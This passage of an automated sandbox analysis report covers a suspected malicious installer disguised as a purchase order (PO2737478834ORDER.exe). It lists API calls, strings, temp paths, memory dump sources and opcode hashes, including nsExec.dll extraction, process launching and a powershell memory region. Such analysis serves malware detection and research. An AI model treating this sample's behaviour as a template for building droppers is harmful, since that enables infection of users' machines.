                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-2145255484
                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction ID: 4e9c794251620aa29aecb4049673505928abe3d31fb5bce1aa7abaa38b2a0d50
                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction Fuzzy Hash: 2DD0A7A22015347AD20166254C06DDB690C8F02310B050066F200B2191C63C4C1147FD
                                                        APIs
                                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                                        • CharNextA.USER32(00000000), ref: 00405B05
                                                        • CharNextA.USER32(00000000), ref: 00405B19
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsxE304.tmp, xrefs: 00405AF3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsxE304.tmp
                                                        • API String ID: 3213498283-2408285490
                                                        • Opcode ID: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                                        • Instruction ID: 371d989ad5315216d0c0cc34824f97af3956e00fc8829d3fd4d1a8d6fd0debac
                                                        • Opcode Fuzzy Hash: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                                                        • Instruction Fuzzy Hash: 84F06251E14F956FFB3292680C44B777AA8CB95751F14407BD680762C286BC78408FAA
                                                        APIs
                                                        • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                                                        • Instruction ID: 90c5076a8d782885986fbf54e6784afd95d1d531b418d8ad00c0f3389847d2fc
                                                        • Opcode Fuzzy Hash: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                                                        • Instruction Fuzzy Hash: E1F05E30A41620EBC621BB60FE0CA8B7BA4FB84B81705493AF049B11E8C77448878BDC
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040518B
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004051DC
                                                          • Part of subcall function 00404191: SendMessageA.USER32(000104C0,00000000,00000000,00000000), ref: 004041A3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                                                        • Instruction ID: 1a2e93e4b5b60595961c78cfe9b1f953e315c10ea79d8335bfdfcc16afa4850a
                                                        • Opcode Fuzzy Hash: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                                                        • Instruction Fuzzy Hash: 8B015E31A10709ABEB215F51DD85B5B3A7AEB84314F600537F6007A1D1C73A9C929A69
                                                        APIs
                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Exec,?,?,?,?,00000002,Exec,?,0040625D,80000002), ref: 00405FEE
                                                        • RegCloseKey.ADVAPI32(?,?,0040625D,80000002,Software\Microsoft\Windows\CurrentVersion,Exec,Exec,Exec,?,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll), ref: 00405FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: Exec
                                                        • API String ID: 3356406503-459137531
                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction ID: bc2ee3056b47e5ed157b0296f64e65c5d928d18fe46a96bfb4a95e0d5f896fcd
                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction Fuzzy Hash: C7015A72540209AADF22CF61CC09FDB3BA8EF95364F01403AF955A6190D778D964DFA4
                                                        APIs
                                                        • CharNextExA.USER32(?,?,00000000,00000400,?,700D1708,?,00000002,00000002,x0p), ref: 700D17B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: $
                                                        • API String ID: 3213498283-227171996
                                                        • Opcode ID: 0fb946200ffbcd18e3afa054d9dc504be9c0cf04c7e2effd5463b8c5d29cfb78
                                                        • Instruction ID: 8998a24344333547e4a700bdc2bf0d3977d64d4114d12d5aa1a184889b7f974d
                                                        • Opcode Fuzzy Hash: 0fb946200ffbcd18e3afa054d9dc504be9c0cf04c7e2effd5463b8c5d29cfb78
                                                        • Instruction Fuzzy Hash: 6FF08C3100838A9ADF01CF64CC18BEB3FFA6B11650F140448FD808B282CB71EA29C7E1
                                                        APIs
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422530,Error launching installer), ref: 00405789
                                                        • CloseHandle.KERNEL32(?), ref: 00405796
                                                        Strings
                                                        • Error launching installer, xrefs: 00405773
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                                                        • Instruction ID: 07a2ea870b6c965c9c8bd0de01314bb8301d1462abb1d5e573899e5cf6f1fbe8
                                                        • Opcode Fuzzy Hash: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                                                        • Instruction Fuzzy Hash: EEE04FB0A00309BFEB009B60ED45F7B77ACEB04204F408421BD44F2150E77498148A78
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,00403817,00403631,?,?,00000007,00000009,0000000B), ref: 00403859
                                                        • GlobalFree.KERNEL32(?), ref: 00403860
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040383F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-2145255484
                                                        • Opcode ID: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                                                        • Instruction ID: 8a9dc77c7c1ee1b135259636166a50b6bf5175fc084ac984c046f8d06e3dc5f9
                                                        • Opcode Fuzzy Hash: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                                                        • Instruction Fuzzy Hash: 1BE0EC3350152057C661AF5AAA0475ABAEC7F48B22F05847AF884BB2618B745C429BDC
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO2737478834ORDER.exe,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00405AA6
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO2737478834ORDER.exe,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00405AB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3080008178
                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction ID: b7fadc1cb965da237d7d6f6ff84102907be402caa55b699d9cfbdae9487d107c
                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction Fuzzy Hash: 98D0A9B25099B06EF303A2108C01B8F6A88CF13300F0A00A2E580E21A1C37C4C428BFD
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,774CE800,00000000,00000000,?,?,700D1286,00000000,/TIMEOUT=,00000000), ref: 700D18C9
                                                        • lstrcmpiA.KERNEL32(?,?), ref: 700D18E1
                                                        • CharNextA.USER32(?,?,?,700D1286,00000000,/TIMEOUT=,00000000), ref: 700D18F2
                                                        • lstrlenA.KERNEL32(?,?,?,700D1286,00000000,/TIMEOUT=,00000000), ref: 700D18FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 43172dbdb78e60b34d3e897c727c41edf6529033aac5f51a0a7f7f4f6b840188
                                                        • Instruction ID: 5f4ac893466a50a7515744a5476764c5114f930dd5e584fb4b982171e584406b
                                                        • Opcode Fuzzy Hash: 43172dbdb78e60b34d3e897c727c41edf6529033aac5f51a0a7f7f4f6b840188
                                                        • Instruction Fuzzy Hash: 07F06236604258BFD713DBB5CC10ADDBBA8DF45671B254095EC05D7312DA70EE01ABB0
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BE7
                                                        • CharNextA.USER32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BF8
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction ID: 9eba209a39fe6667a971e8652d35f93e0e0dd93f5ee50219908c4175a565a31b
                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction Fuzzy Hash: C7F0F631204914FFDB02DFA4DD40D9FBBA8EF56350B2540B9E840F7211D634EE01ABA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84m$84m
                                                        • API String ID: 0-2301462912
                                                        • Opcode ID: 1960c0200b60af6a2a600dd8aa0323e1a299b24b93b787691f06239c8797442a
                                                        • Instruction ID: 7167717c8d0d2dbe21c21113c93e4b01a4fe481928cbf1ceb73bf4b9acdc8d44
                                                        • Opcode Fuzzy Hash: 1960c0200b60af6a2a600dd8aa0323e1a299b24b93b787691f06239c8797442a
                                                        • Instruction Fuzzy Hash: 3D92D5B4B012159FEB24DB64D844BAEB7B2FF85304F2481A9D505AF392CB71DD81CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: _
                                                        • API String ID: 0-701932520
                                                        • Opcode ID: c471e09c9dbff106fcca5e20fe2e731309d8b795eefc65598245c92360660bc2
                                                        • Instruction ID: 9a260f8ba6eef4089587c222b5bd855bb43d3326cc4e5422a8449c0d4216f66c
                                                        • Opcode Fuzzy Hash: c471e09c9dbff106fcca5e20fe2e731309d8b795eefc65598245c92360660bc2
                                                        • Instruction Fuzzy Hash: 63213AB13053416FDF214A15E8807B97F62AF82215F0890F6E904DF293C77AEC89C762
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65c7c9b124003c86e74ac4099fb64eaee3fab2cee69dc9686867f4694de83a7f
                                                        • Instruction ID: fab365ee5785eca7056f876d4d85598837b92e16ee416ac166963f3c14f311aa
                                                        • Opcode Fuzzy Hash: 65c7c9b124003c86e74ac4099fb64eaee3fab2cee69dc9686867f4694de83a7f
                                                        • Instruction Fuzzy Hash: 593208B1B01205DFDB24CF64D444BAAB7F2EF89615F18906AD805AF352DB35DC81CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c65d7a03f19e25c9060287f949603458464598ea01a25ba059eee89327cbad44
                                                        • Instruction ID: 82617ecbb4197cf319818614ad72db9b15bb57cecbf1f5a8cfd4f4159a3c4f42
                                                        • Opcode Fuzzy Hash: c65d7a03f19e25c9060287f949603458464598ea01a25ba059eee89327cbad44
                                                        • Instruction Fuzzy Hash: 181258B1B053159FEB249B68A8047BAB7F2AFC6214F14806BD545DB342DB71DC82C7E2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a3385a468cf52762bba0cb85f2a571bc80cc79442ceae6d75aff2ae57ef70f1
                                                        • Instruction ID: 97867f2f6ae21478f8ac80aeb17b2dae25d5e70a3fc065b3511e496069e9d4b5
                                                        • Opcode Fuzzy Hash: 2a3385a468cf52762bba0cb85f2a571bc80cc79442ceae6d75aff2ae57ef70f1
                                                        • Instruction Fuzzy Hash: 6D3273B4B012149FE720DB54D444BAEB7B2FB89308F61C199D9096F791CB72ED828F91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32728134bb533cb991d214cfb37249779924c74542738723f3a0a79c581a8a72
                                                        • Instruction ID: 32f40d31dffa5eba4e0571f760b4ba193da088e79e1431152690264cb79d9ee1
                                                        • Opcode Fuzzy Hash: 32728134bb533cb991d214cfb37249779924c74542738723f3a0a79c581a8a72
